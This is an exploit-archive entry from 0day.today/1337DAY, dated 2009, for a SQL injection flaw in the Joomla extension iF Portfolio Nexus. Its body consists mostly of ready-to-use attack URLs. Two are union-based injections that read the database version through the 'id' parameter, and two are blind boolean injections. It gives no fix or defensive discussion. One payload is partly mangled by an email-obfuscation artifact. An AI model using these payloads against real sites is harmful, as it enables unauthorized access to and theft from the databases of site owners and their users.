Joomla Ext. iF Portfolio Nexus SQL injection

2009-11-18T00:00:00
ID 1337DAY-ID-9995
Type zdt
Reporter 599eme
Modified 2009-11-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================
Joomla Ext. iF Portfolio Nexus SQL injection
============================================

# [+] SQL
#
# http://server/portfolio?view=item&id=-100%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
# http://server/portfolio?controller=sections&view=item&id=-71%20union%20all%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
#
# [+] Blind
#
# http://server/portfolio?controller=sections&view=item&id=71%20and%20substring%[email protected]@version,1,1%29=5
# http://server/portfolio?view=item&id=100 and substring(@@version,1,1)=5
#
#[--------------------------------



#  0day.today [2018-04-12]  #